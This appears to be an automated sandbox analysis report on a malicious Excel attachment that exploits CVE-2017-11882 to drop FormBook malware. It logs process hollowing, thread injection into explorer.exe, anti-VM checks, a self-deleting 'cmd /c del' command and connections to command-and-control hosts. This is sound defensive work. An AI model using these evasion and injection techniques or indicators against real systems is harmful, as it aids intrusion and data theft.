          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Shipping documents.xlsxReversingLabs: Detection: 33%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Users\Public\vbc.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe {path}
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: ipconfig.pdb source: vbc.exe, 00000005.00000003.2169920135.000000000081C000.00000004.00000001.sdmp
          Source: Binary string: ipconfig.pdbN source: vbc.exe, 00000005.00000003.2169920135.000000000081C000.00000004.00000001.sdmp
          Source: Binary string: .pDBl source: vbc.exe, 00000004.00000002.2135911744.0000000002374000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, ipconfig.exe
          Source: Shipping documents.xlsxInitial sample: OLE indicators vbamacros = False
          Source: Shipping documents.xlsxInitial sample: OLE indicators encrypted = True

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: vbc[1].exe.2.dr, SimpleTextEditor/LoginForm.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: vbc.exe.2.dr, SimpleTextEditor/LoginForm.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.vbc.exe.ec0000.2.unpack, SimpleTextEditor/LoginForm.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.vbc.exe.ec0000.0.unpack, SimpleTextEditor/LoginForm.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.vbc.exe.ec0000.0.unpack, SimpleTextEditor/LoginForm.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.2.vbc.exe.ec0000.3.unpack, SimpleTextEditor/LoginForm.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00EC8AB2 push ss; iretd
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00EC8088 push 00000000h; iretd
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00EC8981 push ss; iretd
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00492993 pushad ; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3C5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B47C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B412 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B41B push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004154C6 push 00000007h; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041552A push es; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041558B push es; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00EC8088 push 00000000h; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00EC8981 push ss; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00EC8AB2 push ss; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023ADFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B3C5 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B41B push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B412 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B47C push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_000954C6 push 00000007h; iretd
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009552A push es; iretd
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009558B push es; iretd
          Source: initial sampleStatic PE information: section name: .text entropy: 7.70882219483
          Source: initial sampleStatic PE information: section name: .text entropy: 7.70882219483

          Persistence and Installation Behavior:

          barindex
          Uses ipconfig to lookup or modify the Windows network settingsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ASP.NET_4.0.30319\NamesJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: Shipping documents.xlsxStream path 'EncryptedPackage' entropy: 7.99819881034 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000004.00000002.2136150916.0000000002554000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 532, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME8
          Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL8
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000000885F4 second address: 00000000000885FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 000000000008898E second address: 0000000000088994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088C0 rdtsc
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\Public\vbc.exeWindow / User API: threadDelayed 653
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2552Thread sleep time: -300000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2792Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2792Thread sleep time: -75000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2664Thread sleep time: -41500s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2740Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 1552Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 1688Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmpBinary or memory string: VMWARE8
          Source: explorer.exe, 00000006.00000002.2344827984.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2146046712.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.2146086153.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmpBinary or memory string: VMWAREHD?m
          Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II8
          Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmpBinary or memory string: VMware HD?m
          Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmpBinary or memory string: QEMU8
          Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmpBinary or memory string: >m"SOFTWARE\VMware, Inc.\VMware Tools8
          Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmpBinary or memory string: >m%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\8
          Source: explorer.exe, 00000006.00000000.2145883576.00000000041DB000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmpBinary or memory string: VMwareHD?m
          Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000006.00000002.2344866221.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmpBinary or memory string: vmware8
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088C0 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409B30 LdrLoadDll,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00900080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009000EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009226F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023B26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 52.58.78.16 80
          Source: C:\Windows\explorer.exeNetwork Connect: 85.10.195.227 80
          Source: C:\Windows\explorer.exeNetwork Connect: 160.124.66.42 80
          Source: C:\Windows\explorer.exeNetwork Connect: 188.93.150.44 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.146 80
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.162.138 80
          Source: C:\Windows\explorer.exeNetwork Connect: 92.42.39.29 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.161.187.200 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.16.16.194 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: F70000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe {path}
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000006.00000002.2345075431.00000000006F0000.00000002.00000001.sdmp, ipconfig.exe, 00000007.00000002.2345095508.0000000000F80000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000002.2345075431.00000000006F0000.00000002.00000001.sdmp, ipconfig.exe, 00000007.00000002.2345095508.0000000000F80000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000002.2344827984.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000002.2345075431.00000000006F0000.00000002.00000001.sdmp, ipconfig.exe, 00000007.00000002.2345095508.0000000000F80000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2136258521.0000000003341000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2344806052.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2170693732.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2170740872.0000000000180000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2136301403.00000000033BB000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2136258521.0000000003341000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2344806052.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2170693732.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2170740872.0000000000180000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2136301403.00000000033BB000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Windows Service1Windows Service1Masquerading111OS Credential DumpingSecurity Software Discovery321Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsProcess Injection612Virtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol23SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information41Cached Domain CredentialsSystem Network Configuration Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery113Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 323357 Sample: Shipping documents.xlsx Startdate: 26/11/2020 Architecture: WINDOWS Score: 100 39 www.bigdillenergy.com 2->39 55 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 Multi AV Scanner detection for dropped file 2->59 61 15 other signatures 2->61 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 37 17 2->16         started        signatures3 process4 dnsIp5 47 216.170.126.121, 49165, 80 AS-COLOCROSSINGUS United States 11->47 33 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 11->33 dropped 35 C:\Users\Public\vbc.exe, PE32 11->35 dropped 79 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->79 18 vbc.exe 2 5 11->18         started        37 C:\Users\user\...\~$Shipping documents.xlsx, data 16->37 dropped file6 signatures7 process8 signatures9 49 Multi AV Scanner detection for dropped file 18->49 51 Tries to detect virtualization through RDTSC time measurements 18->51 53 Injects a PE file into a foreign processes 18->53 21 vbc.exe 18->21         started        process10 signatures11 63 Modifies the context of a thread in another process (thread injection) 21->63 65 Maps a DLL or memory area into another process 21->65 67 Sample uses process hollowing technique 21->67 69 Queues an APC in another process (thread injection) 21->69 24 explorer.exe 21->24 injected process12 dnsIp13 41 www.mondzorg-postma.com 188.93.150.44, 49169, 80 SIGNET-ASSignetBVNL Netherlands 24->41 43 www.yanasacha.com 160.124.66.42, 49175, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK South Africa 24->43 45 15 other IPs or domains 24->45 71 System process connects to network (likely due to code injection or exploit) 24->71 28 ipconfig.exe 24->28         started        signatures14 process15 signatures16 73 Modifies the context of a thread in another process (thread injection) 28->73 75 Maps a DLL or memory area into another process 28->75 77 Tries to detect virtualization through RDTSC time measurements 28->77 31 cmd.exe 28->31         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Shipping documents.xlsx33%ReversingLabsDocument-Word.Exploit.CVE-2017-11882

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe29%ReversingLabsWin32.Trojan.Generic
          C:\Users\Public\vbc.exe29%ReversingLabsWin32.Trojan.Generic

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          nziyade.com0%VirustotalBrowse
